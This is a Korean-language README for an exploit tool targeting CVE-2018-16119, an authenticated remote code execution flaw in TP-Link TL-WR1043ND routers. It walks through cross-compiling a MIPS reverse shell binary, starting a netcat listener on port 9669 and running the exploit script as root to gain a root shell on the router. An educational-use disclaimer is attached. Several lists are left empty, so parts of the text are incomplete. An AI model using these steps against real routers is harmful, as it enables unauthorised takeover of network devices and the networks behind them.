
TP-Link TL-WR1043ND - 인증된 원격 코드 실행
CVE-2018-16119는 TP-Link TL-WR1043ND 라우터에 영향을 주는 심각한 인증된 원격 코드 실행 취약점입니다. 이 취약점으로 인해 인증된 공격자는 대상 장치에서 루트 권한으로 임의의 명령을 실행할 수 있으며, 잠재적으로 시스템 전체를 완전히 장악할 수 있습니다.
CVE 세부 정보: CVE-2018-16119
악용에 성공하면 공격자는 라우터에 대한 루트 셸 접근 권한을 획득하여 다음을 수행할 수 있습니다:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
이 익스플로잇에는 MIPS 빅엔디안 리버스 셸 바이너리가 필요합니다. 다음 단계에 따라 컴파일하십시오:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Docker 컨테이너 내부에서:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Docker를 종료하고 컴파일된 바이너리를 복사합니다:
cp /tmp/shh exploit/tftp_server/
터미널을 열고 포트 9669에서 netcat 리스너를 시작합니다:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
루트 권한으로 익스플로잇 스크립트를 실행합니다 (TFTP 서버에 필요):
sudo python3 exploit/exploit.py
스크립트는 다음을 수행합니다:
연결이 설정되면:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
이 취약점은 책임 있는 방식으로 공개되었으며 다음 용도로만 사용해야 합니다:
⚠️ 경고: 이 익스플로잇은 교육 및 승인된 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다. 사용자는 이 도구를 사용하기 전에 적절한 승인을 받았는지 확인할 책임이 있습니다.
Python 요구 사항 설치:
pip3 install -r exploit/requirements.txt
TFTP 서버 권한 거부:
연결 실패:
셸 응답 없음:
id 또는 pwd 같은 기본 명령어를 입력해 보십시오이 연구는 임베디드 장치 펌웨어의 심각한 보안 결함을 입증합니다. 이 취약점은 다음의 중요성을 강조합니다:
연구자: Alejandro Parodi
트위터: @hdbreaker
링크드인: Alejandro Parodi
이 연구는 교육 목적과 임베디드 시스템의 보안을 개선하기 위해 수행되었습니다. 책임감 있게 사용하십시오.